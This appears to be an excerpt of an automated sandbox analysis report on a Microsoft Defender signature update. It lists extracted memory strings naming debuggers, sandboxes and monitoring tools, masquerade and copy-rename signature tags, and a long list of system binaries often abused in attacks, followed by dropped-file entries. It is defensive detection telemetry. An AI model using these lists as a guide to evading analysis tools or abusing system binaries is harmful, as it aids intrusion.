Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: DBGHELP.DLLSBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: OLLYDBGOLLYICEPEDITORLORDPEC32ASMIMPORTREC.EXE
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6326616398.00000197A3216000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: PTABLE)(LAPTOP)(NOTEBOOK)(SUB NOTEBOOK)%S \%D.%D.%D.%D%04X%04XSBIEDLL.DLLDBGHELP.DLLAPI_LOG.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 00000024.00000003.6350540468.00000197A32DC000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: QEMU-GA.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp Binary or memory string: |ACCESSCHK.EXE|ACCESSCHK64.EXE|ACCESSENUM.EXE|ACRORD32.EXE|ADEXPLORER.EXE|ADINSIGHT.EXE|ADRESTORE.EXE|APPLICATIONFRAMEHOST.EXE|APPVCLIENT.EXE|APPVLP.EXE|ATBROKER.EXE|AUDIODG.EXE|AUTORUNS.EXE|AUTORUNS64.EXE|AUTORUNSC.EXE|AUTORUNSC64.EXE|BASH.EXE|BGINFO.EXE|BGINFO64.EXE|BITSADMIN.EXE|BROWSER_BROKER.EXE|CALC.EXE|CDB.EXE|CERTUTIL.EXE|CLOCKRES.EXE|CLOCKRES64.EXE|CMD.EXE|CMDKEY.EXE|CMSTP.EXE|CONHOST.EXE|CONSENT.EXE|CONTIG.EXE|CONTIG64.EXE|CONTROL.EXE|COREINFO.EXE|CSC.EXE|CSCRIPT.EXE|CSI.EXE|CSRSS.EXE|CTFMON.EXE|CTRL2CAP.EXE|DASHOST.EXE|DATAEXCHANGEHOST.EXE|DBGVIEW.EXE|DFSVC.EXE|DISK2VHD.EXE|DISKEXT.EXE|DISKEXT64.EXE|DISKSHADOW.EXE|DLLHOST.EXE|DNSCMD.EXE|DNX.EXE|DXCAP.EXE|ESENTUTL.EXE|EXPAND.EXE|EXPLORER.EXE|EXTEXPORT.EXE|EXTRAC32.EXE|FINDLINKS.EXE|FINDLINKS64.EXE|FINDSTR.EXE|FONTDRVHOST.EXE|FORFILES.EXE|FXSSVC.EXE|GPSCRIPT.EXE|GPUP.EXE|HANDLE.EXE|HANDLE64.EXE|HEX2DEC.EXE|HEX2DEC64.EXE|HH.EXE|IE4UINIT.EXE|IEEXEC.EXE|INFDEFAULTINSTALL.EXE|INSTALLUTIL.EXE|JUNCTION.EXE|JUNCTION64.EXE|LDMDUMP.EXE|LIVEKD.EXE|LIVEKD64.EXE|LOADORD.EXE|LOADORD64.EXE|LOADORDC.EXE|LOADORDC64.EXE|LOCKAPP.EXE|LOGONSESSIONS.EXE|LOGONSESSIONS64.EXE|LSAISO.EXE|LSASS.EXE|MAKECAB.EXE|MAVINJECT.EXE|MFTRACE.EXE|MICROSOFTEDGE.EXE|MICROSOFTEDGECP.EXE|MICROSOFTEDGESH.EXE|MSBUILD.EXE|MSCONFIG.EXE|MSDEPLOY.EXE|MSDT.EXE|MSDTC.EXE|MSHTA.EXE|MSIEXEC.EXE|MSXSL.EXE|NETSH.EXE|NLNOTES.EXE|NLTEST.EXE|NOTES.EXE|NOTMYFAULT.EXE|NOTMYFAULT64.EXE|NOTMYFAULTC.EXE|NOTMYFAULTC64.EXE|NTFSINFO.EXE|NTFSINFO64.EXE|NTOSKRNL.EXE|NVUDISP.EXE|NVUHDA6.EXE|ODBCCONF.EXE|OPENWITH.EXE|PAGEDFRG.EXE|PCALUA.EXE|PCWRUN.EXE|PENDMOVES.EXE|PENDMOVES64.EXE|PIPELIST.EXE|PIPELIST64.EXE|POWERSHELL.EXE|PRESENTATIONHOST.EXE|PRINT.EXE|PROCDUMP.EXE|PROCDUMP64.EXE|PROCEXP.EXE|PROCEXP64.EXE|PROCMON.EXE|PSEXEC.EXE|PSEXEC64.EXE|PSFILE.EXE|PSFILE64.EXE|PSGETSID.EXE|PSGETSID64.EXE|PSINFO.EXE|PSINFO64.EXE|PSKILL.EXE|PSKILL64.EXE|PSLIST.EXE|PSLIST64.EXE|PSLOGGEDON.EXE|PSLOGGEDON64.EXE|PSLOGLIST.EXE|PSLOGLIST64.EXE|PSPASSWD.EXE|PSPASSWD64.EXE|PSPING.EXE|PSPING64.EXE|PSR.EXE|PSSERVICE.EXE|PSSERVICE64.EXE|PSSHUTDOWN.EXE|PSSUSPEND.EXE|PSSUSPEND64.EXE|PWSH.EXE|RAMMAP.EXE|RCSI.EXE|REG.EXE|REGASM.EXE|REGDELNULL.EXE|REGDELNULL64.EXE|REGEDIT.EXE|REGISTER-CIMPROVIDER|REGJUMP.EXE|REGSVCS.EXE|REGSVR32.EXE|REPLACE.EXE|ROBOCOPY.EXE|ROCCAT_SWARM.EXE|RPCPING.EXE|RUNDLL32.EXE|RUNONCE.EXE|RUNSCRIPTHELPER.EXE|RUNTIMEBROKER.EXE|SC.EXE|SCRIPTRUNNER.EXE|SDELETE.EXE|SDELETE64.EXE|SDIAGNHOST.EXE|SEARCHFILTERHOST.EXE|SEARCHINDEXER.EXE|SEARCHPROTOCOLHOST.EXE|SECURITYHEALTHSERVICE.EXE|SERVICES.EXE|SETTINGSYNCHOST.EXE|SGRMBROKER.EXE|SIGCHECK.EXE|SIGCHECK64.EXE|SIHOST.EXE|SMARTSCREEN.EXE|SMSS.EXE|SPLWOW64.EXE|SPOOLSV.EXE|SPPSVC.EXE|SQLDUMPER.EXE|SQLPS.EXE|SQLTOOLSPS.EXE|STREAMS.EXE|STREAMS64.EXE|SURFACECOLORSERVICE.EXE|SURFACESERVICE.EXE|SVCHOST.EXE|SYNCAPPVPUBLISHINGSERVER.EXE|SYNCHOST.EXE|SYSMON.EXE|SYSMON64.EXE|SYSTEMSETTINGSBROKER.EXE|TASKHOSTW.EXE|TASKMGR.EXE|TCPVCON.EXE|TCPVIEW.EXE|TE.EXE|TRACKER.EXE|USBINST.EXE|VBOXDRVINST.EXE|VMCOMPUTE.EXE|VMMAP.EXE|VMMS.EXE|VSJITD
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: SNIFFER.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: IFPROCESSEXISTS("SANDBOXIERPCSS.EXE")ORPROCESSEXISTS("SANDBOXIEDCOMLAUNCH.EXE")THEN
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: DIR_WATCH.DLL
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLA
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp Binary or memory string: *.LOG.|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6350540468.00000197A32DC000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\MpAsDesc.dll.mui Jump to dropped file
